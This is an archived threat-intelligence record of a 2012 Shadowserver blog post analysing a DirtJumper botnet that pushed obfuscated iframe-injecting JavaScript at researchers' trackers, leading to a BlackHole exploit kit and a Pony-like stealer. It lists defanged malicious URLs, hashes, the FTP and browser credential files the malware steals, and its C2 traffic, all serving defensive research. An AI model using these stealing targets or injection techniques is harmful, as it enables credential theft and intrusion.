{
	"id": "9364ecea-a18f-4be4-8043-fbb471b3912b",
	"created_at": "2026-04-06T00:13:59.075428Z",
	"updated_at": "2026-04-10T03:21:24.430358Z",
	"deleted_at": null,
	"sha1_hash": "e43c021006743a2b311e296bf4eb762c0b5c1b6b",
	"title": "Beware the trolls, secure your trackers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 197872,
	"plain_text": "Beware the trolls, secure your trackers\r\nArchived: 2026-04-05 18:24:42 UTC\r\nby Claudio Guarnieri\r\n(Note: the post was originally written on Aug 8th 2012)\r\nYou track botnets? Right, we do as well.\r\nYou spent your weekends building your slick botnet trackers and some fancy web interface? Damn, we did too.\r\nBut let’s face the truth, DDoS is f**king boring. What gives better sense to your day than some random crook trolling you\r\nand your monitoring infrastructure? Nothing.\r\nSo here’s what happened today…\r\nSince I’m not really following the DDoS scene a lot lately, I kinda left over for some time the trackers that I built and that\r\nwe are using internally in Shadowserver. Today I decided to open it up again just to show it some love and check if there\r\nwas anything interesting being targeted, while sipping my coffee.\r\nI was expecting the usual amount of porn websites, random Russian forums, Lineage II shards and the traditional average\r\ntarget for the traditional average botnet, but that wasn’t the case today… something stood out.\r\nOne of the DirtJumper botnets we are tracking, located on the domain “bnbgcw.com”, started spreading some weird\r\ncommands:\r\nThe beginning of the command is a traditional DirtJumper response, some basic parameters (like threads, duration of attack,\r\ndelay of C\u0026C polling and such) separated by a dash and followed by the actual target of the DDoS attack, and here comes\r\nthe funny thing. Appended to the original target (which was already being attacked previously and that isn’t really relevant\r\nfor us at this stage) is a whole bunch of obfuscated JavaScript code.\r\nI removed the whole obfuscated code, but you can see it decoded as follows:\r\nhttps://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/\r\nPage 1 of 5\n\nSo what this thing does in short is:\r\n1. dynamically generate a domain out of a given seed and the current date\r\n2. 
use the domain to build a landing URL\r\n3. embed the URL in an \u003ciframe\u003e which is then printed in the page body\r\nIn the end, it will load a page located at:\r\nhxxp://kegkvfoagyqoouky[.]ru/in.cgi?15\r\nSo, assuming that this guy is not dumb enough to possibly try to magically remote exploit or inject the target page through\r\nthe use of his botnet, my idea is that what he is actually trying to achieve is to exploit security researchers like us that are\r\ntracking his own botnet.\r\nIt’s actually quite a sharp idea: your tracker pulls the command from his C\u0026C, stores it in some sort of database and prints it\r\nin your fancy web interface, you didn’t bother to sanitize the data, the \u003ciframe\u003e gets embedded in your own page and\r\nBANG, you’re pwned.\r\nIf you run the URL through Thug (thanks Angelo!), you’ll see that the page (when meeting certain requirements) actually\r\nredirects to:\r\nhxxp://wertbuy.toythieves[.]com/main.php?page=9dd146e88937797b\r\nA BlackHole setup which, after a failed attempt at loading a Java applet Torb.jar (1/41), successfully used the\r\ninfamous Microsoft MDAC RDS.Dataspace ActiveX vulnerability to exploit the browser and drop the payload. 
Nothing\r\nnew, traditional BlackHole behavior, but you can find the complete Thug report here.\r\nUpon successful exploitation, it drops a payload with the following characteristics:\r\nFile size: 348672 bytes\r\nFile type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\r\nCRC32: C9ABC946\r\nMD5: 4ce73d6a52bfa3f56c67942f8ebf2c69\r\nSHA1: 6ce4f9bbf786f69a51d7f54e2cc190e438eb1c24\r\nSHA256: ac81dc130e331d6e0f09e58b520981776aebfaf8e3dab68e96d4e2252b0a6f7c\r\nSHA512:\r\nb2d7edba3470c179873555e2937cd28c471a6b4da83632157d27cc7d2d58caffe97f7a2fc63199ed83d3d251fd0dbae849b86a1860234aecac0594\r\nSsdeep: 1536:Qy23ZX+7rtoub3aBsUV+xhhD2a4ToJsQ0fd3AonLa:Qy2Ngr3Ev+tya99\r\nWe are not sure yet about the nature of the malware as it has an extremely low detection rate (1/40), but it looks consistent with\r\nPony, a loader and infostealer widely used in ZeuS campaigns.\r\nThe first reason we believe it is that, just like Pony, this sample is not persistent: it executes from memory, deletes\r\nitself and just disappears.\r\nThe second reason is the data it tries to collect and steal:\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP\\sm.dat\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP\\\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP Pro\\sm.dat\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP Pro\\\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP Lite\\sm.dat\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP Lite\\\r\nC:\\Documents and Settings\\User\\Application Data\\CuteFTP\\sm.dat\r\nC:\\Documents and Settings\\User\\Application Data\\CuteFTP\\\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\3\\Sites.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\4\\Sites.dat\r\nC:\\Documents and Settings\\User\\Application 
Data\\FlashFXP\\3\\Quick.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\4\\Quick.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\3\\History.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\4\\History.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FileZilla\\sitemanager.xml\r\nC:\\Documents and Settings\\User\\Application Data\\FileZilla\\recentservers.xml\r\nC:\\Documents and Settings\\User\\Application Data\\FileZilla\\filezilla.xml\r\nC:\\Documents and Settings\\User\\Application Data\\SmartFTP\\\r\nC:\\Documents and Settings\\User\\Application Data\\TurboFTP\\\r\nC:\\Documents and Settings\\User\\Application Data\\FTP Explorer\\\r\nC:\\Documents and Settings\\User\\Application Data\\Frigate3\\\r\nC:\\Documents and Settings\\User\\Application Data\\VanDyke\\Config\\Sessions\\\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\profiles.ini\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\bookmarkbackups\\\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\minidumps\\\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\signons.sqlite\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\secmod.db\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\cert8.db\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\key3.db\r\nAnd much, much more…\r\nIt then establishes network communication with “coppercreek.ru”:\r\nPOST /boi854tr4w.php HTTP/1.0\r\nHost: coppercreek.ru\r\nAccept: 
*/*\r\nAccept-Encoding: identity, *;q=0\r\nContent-Length: 269\r\nConnection: close\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 08 Aug 2012 16:33:11 GMT\r\nContent-Type: text/html; charset=windows-1251\r\nContent-Length: 16\r\nConnection: close\r\nX-Powered-By: PHP/5.3.15\r\nVary: Accept-Encoding,User-Agent\r\nSTATUS-IMPORT-OK\r\nWe are not sure about the nature of the encryption; it will need more time to analyze it. 
If you have already encountered this and\r\nyou are able to recognize the family, please let us know.\r\nNo additional payload was dropped.\r\nIt’s very interesting to note that this payload was uploaded both on VirusTotal and on Malwr.com today from a Verizon\r\nWireless connection in the USA. As you can see, the analysis on Malwr failed (side note: Malwr is currently running a very\r\noutdated version of Cuckoo Sandbox, whose version 0.4 is perfectly able to analyze this sample).\r\nThis attack has been going on for a couple of days already, but the latest version has been updated today.\r\nA very similar version of this sample, with the same behavior and file name, was uploaded by the same guy a few days\r\nearlier on Malwr.com and on VirusTotal again.\r\nIn that case the results of Malwr’s analysis as well as antivirus detection were much better; therefore, unless some of you\r\nguys come forward these days to tell me it was him, this makes me believe that the mastermind behind these attacks has been\r\nactively trying to enhance his evasion and anti-detection techniques until he reached satisfying results.\r\nThis could be a whole big speculation; the guy might just be totally dumb and there was no intention to actually target botnet\r\nresearchers.\r\nBut if this was actually a correct interpretation, it’s a very interesting learning experience and a warning to all the\r\nresearchers out there feeling safe: our security panopticon could actually turn inside out and make us the ones being\r\nwatched.\r\nUpdate #1: the detection rate of the sample increased to 16/41 at this time.\r\nUpdate #2: Our friend Armin from WebSense informed us that this attack matches an ongoing campaign that they have\r\nbeen tracking. Seems like this DirtJumper C\u0026C got compromised and it’s distributing the JavaScript code we presented. 
It’s\r\nkinda hilarious, crooks getting pwned by other crooks, but the result is still the same: some harmful code included in the\r\ncontext of trusted applications such as our botnet trackers.\r\nSource: https://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/"
	],
	"report_names": [
		"beware-the-trolls-secure-your-trackers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434439,
	"ts_updated_at": 1775791284,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e43c021006743a2b311e296bf4eb762c0b5c1b6b.pdf",
		"text": "https://archive.orkl.eu/e43c021006743a2b311e296bf4eb762c0b5c1b6b.txt",
		"img": "https://archive.orkl.eu/e43c021006743a2b311e296bf4eb762c0b5c1b6b.jpg"
	}
}